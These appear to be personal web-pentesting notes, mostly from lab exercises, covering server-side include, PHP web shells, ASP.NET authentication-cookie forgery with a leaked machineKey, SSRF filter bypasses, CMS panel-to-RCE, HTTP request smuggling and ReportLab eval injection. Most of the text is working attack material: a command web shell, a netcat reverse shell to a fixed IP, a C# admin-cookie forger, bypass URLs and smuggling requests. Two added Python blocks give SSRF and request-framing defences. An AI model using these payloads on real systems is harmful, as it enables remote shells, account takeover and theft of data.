<!--#include file="/web.config" -->
```
The included content appears in the page source
### Exploit - Web Shell RCE
#### PHP
PoC
```php
<?php phpinfo(); ?>
```
Web shell
```php
<?php echo "<pre>" . shell_exec($_GET["cmd"]) . "</pre>"; ?>
```
```php
<?php echo "<pre>" . shell_exec("mkfifo /tmp/f; nc 10.4.42.63 80 < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f") . "</pre>"; ?>
```
Works on Windows XAMPP
# Cookie Cracking
## ASP.NET (web.config)
Check the httpRuntime tag
![image](https://hackmd.io/_uploads/Hyi8yrz70.png)
If the machine does not have the specified version, install the targeting pack from Microsoft
Version: 4.6.1
https://www.microsoft.com/en-us/download/details.aspx?id=49978
![image](https://hackmd.io/_uploads/rkQiTDmXC.png)
Decryption code
https://github.com/liquidsec/aspnetCryptTools/blob/main/FormsDecrypt.cs
Add a reference to System.Web
![image](https://hackmd.io/_uploads/ryMfzK77A.png)
Add the machineKey to App.config (from the repo)
https://github.com/liquidsec/aspnetCryptTools/blob/main/app.config
```xml
<?xml version="1.0"?>
<configuration>
  <system.web>
    <compilation debug="false" targetFramework="4.0" />
    <machineKey validationKey="99F1108B685094A8A31CDAA9CBA402028D80C08B40EBBC2C8E4BD4B0D31A347B0D650984650B24828DD120E236B099BFDD491910BF11F6FA915BF94AD93B52BF" decryptionKey="B16DA07AB71AB84143A037BCDD6CFB42B9C34099785C10F9" validation="SHA1" decryption="AES" />
  </system.web>
</configuration>
```
![image](https://hackmd.io/_uploads/ryVU7FNQA.png)
Decrypting the .ASPXAUTH value
![image](https://hackmd.io/_uploads/rkTmPKNXC.png)
![image](https://hackmd.io/_uploads/rkhcwtNXA.png)
Modify the user account -> admin email
Decrypted ticket fields:
```
1
nicstesting01@gmail.com 2024/5/17 下午 03:22:29
2024/5/17 下午 03:52:29
True
test
/
```
Cookie parameter analysis (FormsAuthenticationTicket constructor)
https://learn.microsoft.com/en-us/dotnet/api/system.web.security.formsauthenticationticket.-ctor?redirectedfrom=MSDN&view=netframework-4.8#system-web-security-formsauthenticationticket-ctor(system-int32-system-string-system-datetime-system-datetime-system-boolean-system-string)
version
name
issueDate
expiration
isPersistent
userData
## Generate Admin Cookie
Source code
https://github.com/liquidsec/aspnetCryptTools/blob/main/FormsEncrypt.cs
![image](https://hackmd.io/_uploads/HyesjFEQ0.png)
```csharp
using System;
using System.Web.Security;

namespace FormsEncryptor
{
    class Program
    {
        static void Main(string[] args)
        {
            // Take an existing forms cookie
            string encryptedTicket = "8A9A1063BAE0F9E7E881A908E4DEA1C4F2BC2DE8995DB401651CD6F653289C1BF05371D2FE6A5E412AE7C4F4BBEA9B630335576CA4E65DCA42CDBC8207A125E0CCD9CD6CDA0E6468D060DCB409F981F04CEEBAE7CB617E74DD3E3849CE3DA02A9C7201667D7DCF8956724E2572148192CD1F446ED28BC4601C24463280E6A20BF2530D31A67CD627172E504CC77F12374D7E8DDF";
            string adminUsername = "admin@perspective.htb";
            FormsAuthenticationTicket unencryptedTicket = FormsAuthentication.Decrypt(encryptedTicket);
            FormsAuthenticationTicket ticket = new FormsAuthenticationTicket(
                1,
                adminUsername, // the username to set; use unencryptedTicket.Name to keep the original
                DateTime.Now,
                DateTime.Now.AddMinutes(1200000), // push the expiry far into the future
                unencryptedTicket.IsPersistent,
                unencryptedTicket.UserData,
                "/"
            );
            string encTicket = FormsAuthentication.Encrypt(ticket);
            Console.WriteLine(encTicket);
            Console.Read();
        }
    }
}
```
Admin cookie
![image](https://hackmd.io/_uploads/ryaQycN70.png)
# SSRF
Hidden attack surface
- Host name, request path
- External entity (exploit XXE to reach SSRF)
- Referer header
Dangerous functions
PHP
```php
file_get_contents()
curl_exec()
fopen(), fread(), fclose()
```
Python
```python
requests.get(), requests.post()
urllib.request.urlopen()
```
ASP
```
ServerXMLHTTP
Server.CreateObject("Msxml2.ServerXMLHTTP")
```
## Bypass (Blocklist)
### Tag Filter
```html
<meta http-equiv="refresh" content="0; url=http://127.0.0.1:8000">
```
The response comes back inside XML, so view the page source to read it
### Alternate Forms of 127.0.0.1
```
2130706433
017700000001
127.1
localtest.me
customer1.app.localhost.my.company.127.0.0.1.nip.io
127.0.0.1.nip.io
spoofed.burpcollaborator.net
```
Case: converting the IP to an integer bypasses the blocklist (works)
https://www.browserling.com/tools/ip-to-dec
### Bypass the Filter via Open Redirect
- open redirect page
- API (the web application launches the request)
![image](https://hackmd.io/_uploads/rJAaoeP70.png)
```
POST /stock (SSRF)
api=/Open/Redirect/Page?path=http://127.0.0.1:8080
/product/nextProduct?currentProductId=1&path=http://192.168.0.12:8080/admin/delete?username=carlos (works)
```
### Bypass the Allowlist
Notice: the hash is double URL-encoded so it is not dropped as a URL fragment
```
http://127.0.0.1#meow:meow@stock.weliketoshop.net
http%3a//127.0.0.1%2523meow%3ameow%40stock.weliketoshop.net
```
Works
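Added example (not part of the original notes): a destination check for server-side fetches that parses the alternate 127.0.0.1 spellings above the way `inet_aton` does, applies a host allow-list, and fails closed; the function names are assumptions.

```python
import ipaddress
import socket
from typing import Optional, Union
from urllib.parse import urlsplit

# Added example (not from the original notes). Literal hosts are parsed the
# way inet_aton does, so the decimal / octal / shorthand spellings of
# 127.0.0.1 listed above all reach the same loopback check. Names go through
# DNS and every answer must be external. Function names are assumptions.

IPAddr = Union[ipaddress.IPv4Address, ipaddress.IPv6Address]


def literal_to_ip(host: str) -> Optional[IPAddr]:
    """Return an address object for a literal host, or None for a DNS name."""
    try:
        return ipaddress.ip_address(host)        # dotted quad or IPv6
    except ValueError:
        pass
    try:
        packed = socket.inet_aton(host)          # 2130706433, 017700000001, 127.1
    except OSError:
        return None
    return ipaddress.IPv4Address(packed)


def is_internal(ip: IPAddr) -> bool:
    """Loopback, RFC 1918, link-local (cloud metadata), reserved, multicast."""
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_reserved or ip.is_multicast or ip.is_unspecified)


def _all_external(answers) -> bool:
    for entry in answers:
        try:
            ip = ipaddress.ip_address(entry[4][0].split("%")[0])
        except ValueError:
            return False
        if is_internal(ip):
            return False
    return True


def ssrf_allowed(url: str, allowed_hosts: Optional[set] = None) -> bool:
    """Fail closed: only http(s), optional host allow-list, no internal IPs.
    The raw 'http://127.0.0.1#meow:meow@stock...' form above is judged on its
    real host (127.0.0.1). Build the outgoing request from these parsed parts
    and connect to the address that was checked (pin the IP): a raw string
    re-parsed by another library, or a rebinding DNS name, could otherwise
    still reach 127.0.0.1."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    host = parts.hostname
    if allowed_hosts is not None and host not in allowed_hosts:
        return False
    ip = literal_to_ip(host)
    if ip is not None:
        return not is_internal(ip)
    try:
        answers = socket.getaddrinfo(host, None)
    except OSError:
        return False
    return _all_external(answers)
```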
# CMS Panel to RCE
## TYPO3 Admin Panel to RCE
![image](https://hackmd.io/_uploads/ByqePz-kC.png)
![image](https://hackmd.io/_uploads/ByCbwG-JA.png)
![image](https://hackmd.io/_uploads/BJ2fwfbJA.png)
![image](https://hackmd.io/_uploads/SyIzPGbkC.png)
![image](https://hackmd.io/_uploads/Sy3mwzZ1A.png)
![image](https://hackmd.io/_uploads/rJaEvf-y0.png)
## WordPress Panel RCE
Trigger the web shell
```
http://$TARGET_IP/wp-content/themes/twentytwelve/404.php
```
## HTTP Header
### IP-Protection Bypass (if the website is behind a proxy)
X-Forwarded-For
```bash
curl -H "X-Forwarded-For:10.10.10.1" 127.0.0.1:3000
```
# HTTP Request Smuggling
Exploit -> HTTP/1.1 (works) - required headers
```
Content-Length:
Transfer-Encoding: chunked
```
Solves "invalid POST request" errors
```
Content-Type: application/x-www-form-urlencoded
```
## CL.TE Vulnerability Identification
Works
```
POST / HTTP/1.1
Host: 0a3300c1033290bc81a2c6af00dd00df.web-security-academy.net
Content-Length: 15
Transfer-Encoding: chunked

0

meowhecker
```
Send it twice -> if the website reports receiving "meowheckerPOST" (the leftover bytes were prepended to the next request), the vulnerability is confirmed.
Time-based detection (works)
```
POST / HTTP/1.1
Host: 0a35008c04210c4984e9b02d00310030.web-security-academy.net
Transfer-Encoding: chunked
Content-Length: 4

1
F
```
(The back end frames by TE and never sees a terminating 0 chunk, so it waits until it times out.)
## TE.CL Vulnerability Identification
Works
```
POST / HTTP/1.1
Host: 0a9600b503329d258047eebb001c002d.web-security-academy.net
Transfer-Encoding: chunked
Content-Length: 2

4c
POST /meowheckerAdminPennel HTTP/1.1
Content-Length: 200

meow=meowhecker
0

```
![image](https://hackmd.io/_uploads/BySfbr8MR.png)
Time-based detection
Works
```
POST / HTTP/1.1
Host: 0a9600b503329d258047eebb001c002d.web-security-academy.net
Transfer-Encoding: chunked
Content-Length: 7

0

10
```
---
![image](https://hackmd.io/_uploads/B154fkwfC.png)
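Added example, not from the original notes: the request-framing checks (RFC 7230 section 3.3.3) a front end or log analyser should run on the CL.TE / TE.CL probes above and reject with 400 instead of forwarding; the function names and the constructed sample request are assumptions.

```python
import re
from typing import List, Tuple

# Added example (not from the original notes): framing checks for an
# HTTP/1.1 request head. Every finding is a reason to answer 400 rather than
# let a back end pick a different body length. Names are assumptions.

_TOKEN = re.compile(r"^[!#$%&'*+.^_`|~0-9A-Za-z-]+$")   # RFC 7230 header-name token


def parse_head(raw: bytes) -> Tuple[str, List[Tuple[str, str]], List[str]]:
    """Return (request line, [(lower-name, value)], malformed header lines)."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    headers, malformed = [], []
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if not sep or not _TOKEN.match(name):   # "Transfer-Encoding : x", "Foo bar"
            malformed.append(line)
            continue
        headers.append((name.lower(), value.strip()))
    return lines[0], headers, malformed


def framing_findings(raw: bytes) -> List[str]:
    """List every reason the body length of this request is ambiguous."""
    _, headers, malformed = parse_head(raw)
    cl = [v for n, v in headers if n == "content-length"]
    te = [v for n, v in headers if n == "transfer-encoding"]
    findings = [f"malformed header line: {m!r}" for m in malformed]
    if cl and te:
        findings.append("Content-Length and Transfer-Encoding both present (CL.TE/TE.CL)")
    if len(set(cl)) > 1:
        findings.append(f"conflicting Content-Length values {cl}")
    findings += [f"non-numeric Content-Length {v!r}" for v in cl if not v.isdigit()]
    for v in te:
        codings = [c.strip().lower() for c in v.split(",")]
        if codings[-1] != "chunked":
            findings.append(f"Transfer-Encoding without final chunked coding: {v!r}")
    return findings


# Constructed sample: the CL.TE probe from the notes above (host replaced).
CLTE_PROBE = (b"POST / HTTP/1.1\r\nHost: example.test\r\n"
              b"Content-Length: 15\r\nTransfer-Encoding: chunked\r\n\r\n"
              b"0\r\n\r\nmeowhecker")
```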
# HTML to PDF RCE: ReportLab
eval() (code injection)
Injection point
The HTML color attribute value is passed to an eval() function.
Defence functions
![image](https://hackmd.io/_uploads/HyvZXQEEC.png)
# PHP Hash
https://www.cnblogs.com/haidragon/p/16845563.html